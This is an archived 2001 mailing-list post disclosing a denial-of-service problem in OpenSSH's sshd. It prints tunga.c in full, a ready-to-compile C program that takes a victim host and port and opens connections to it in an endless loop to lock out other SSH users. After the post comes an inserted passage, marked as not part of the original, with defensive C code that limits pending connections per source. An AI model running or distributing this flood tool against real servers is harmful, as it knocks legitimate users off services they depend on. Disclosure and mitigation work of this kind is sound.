Possible OpenSSH DoS Attack

From: Pedro Inacio (drbrainat_private)
Date: Mon Dec 10 2001 - 15:19:18 PST

    --[ OpenSSH DoS Attack proof of concept ]--
      by DrBrain <drbrainat_private> / http://www.phibernet.org
    
    
    --[ Intro ]--
    
    After some tests with sshd, I have noticed that it is possible to generate a
    DoS attack that gives you the following message when you try to contact the
    service:
    
    ----------
    $ ssh userat_private
    ssh_exchange_identification: Connection closed by remote host
    ----------
    
    This just happens while running the code below, because when you stop
    running it everything works fine.
    
    It seems to be a known problem (
    http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
    is no patch available and this problem is present in all OpenSSH versions.
    
    Although, there is an advisory to compile the SSH server with libwrap
    (TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
    order to allow connections to sshd from any source address.
    
    Anyway, I have made some tests and ALL the machines were vulnerable.
    In my opinion it is urgent to fix this as soon as possible.
    
    --[ Code ]--
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <string.h>
    
    int main (int argc, char *argv[]) {
    
      int sd, rc;
      struct sockaddr_in localAddr, servAddr;
      struct linger ling;
      struct hostent *h;
    
      if(argc < 3) {
        printf("tunga.c - OpenSSH DoS Attack\n");
        printf("by DrBrain <drbrainat_private>\n");
        printf("Phibernet Information Network < http://www.phibernet.org >\n\n");
        printf("Usage: %s <victim> <port>\n\n",argv[0]);
        exit(1);
      }
    
      h = gethostbyname(argv[1]);
      if(h==NULL) {
        printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
        exit(1);
      }
    
      for(;;) {
        servAddr.sin_family = h->h_addrtype;
        memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
    h->h_length);
        servAddr.sin_port = htons(atoi(argv[2]));
    
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd<0) {
          perror("Cannot Open Socket ");
          exit(1);
        }
    
        rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
        if(rc<0) {
          perror("Cannot Connect ");
          exit(1);
        }
      }
      exit(0);
    }
    
    
    That's it!
    
    I would like to thank megas and FatZU and all the guys in Phibernet for
    helping me with some machines while testing the DoS.
    
    -- DrBrain
    "If you don't have a hammer, hack it" ;)
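
Added example, not part of the original post and not OpenSSH code: one defensive response to a connect loop like the one above is to cap, per source address, the connections that have connected but not yet sent an SSH identification string, so one looping client cannot crowd out others. The table size, the limit and all function names are assumptions chosen for illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define MAX_SOURCES 64  /* tracking-table size (assumed for this example) */
#define MAX_PENDING 3   /* unidentified connections allowed per source (assumed) */

/* One slot per source that holds connections which have connected but not
   yet sent an SSH identification string. pending == 0 marks a free slot. */
struct source { uint32_t addr; int pending; };
static struct source table[MAX_SOURCES];

static struct source *lookup(uint32_t addr, int create) {
    struct source *free_slot = NULL;
    for (int i = 0; i < MAX_SOURCES; i++) {
        if (table[i].pending > 0 && table[i].addr == addr) return &table[i];
        if (table[i].pending == 0 && !free_slot) free_slot = &table[i];
    }
    if (!create || !free_slot) return NULL;
    free_slot->addr = addr;
    return free_slot;
}

/* Call after accept(): returns 1 to keep the connection, 0 to close it. */
int conn_accept(uint32_t addr) {
    struct source *s = lookup(addr, 1);
    if (!s || s->pending >= MAX_PENDING) return 0;  /* full table fails closed */
    s->pending++;
    return 1;
}

/* Call when a pending connection identifies itself, closes or times out. */
void conn_release(uint32_t addr) {
    struct source *s = lookup(addr, 0);
    if (s) s->pending--;
}

int main(void) {
    uint32_t looping = 0x0A000005, other = 0x0A000009;  /* constructed addresses */
    int kept = 0;
    for (int i = 0; i < 10; i++) kept += conn_accept(looping);
    printf("looping source: kept %d of 10\n", kept);
    printf("other source accepted: %d\n", conn_accept(other));
    return 0;
}
```

A listener using this also needs a timeout that calls conn_release for connections that never identify themselves.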
    



    This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 16:56:29 PST